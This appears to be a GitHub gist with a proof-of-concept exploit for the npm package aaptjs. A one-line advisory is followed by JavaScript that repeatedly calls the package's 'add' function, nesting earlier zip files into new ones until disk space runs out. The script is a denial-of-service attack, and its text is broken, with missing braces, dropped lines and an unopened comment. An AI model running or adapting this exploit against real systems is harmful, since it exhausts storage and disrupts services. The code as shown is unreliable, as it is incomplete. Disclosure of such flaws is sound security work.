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Last active October 26, 2023 12:09
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Package aaptjs: The aaptjs module's 'add' function can add files to an existing .zip file. It is possible to call it once to create a .zip file and then iteratively create a new .zip from the previous one, eventually filling the file system storage space.
'use strict'
const pkg = require('aaptjs');
* Creates many zip files. After PREV_ZIP_SZ zip files created,
* it starts adding the last PREV_ZIP_SZ zip files to the new one
* rather than just hte previous one.
const manyZipSpam = async function(zipCount) {
var prom_base = await pkg.add('', ['aaptjs_poc.js']);
const PREV_ZIP_SZ = 20;
for (let i = 0; i < zipCount; i++) {
const source_array = [];
if (i > PREV_ZIP_SZ) {
for(let j = PREV_ZIP_SZ; j > 0; j--) {
source_array.push(`test${i - j}.zip`)
else {
var prom = await pkg.add(`test${i+1}.zip`, source_array);
// Increase the number to increase the storage space usage.
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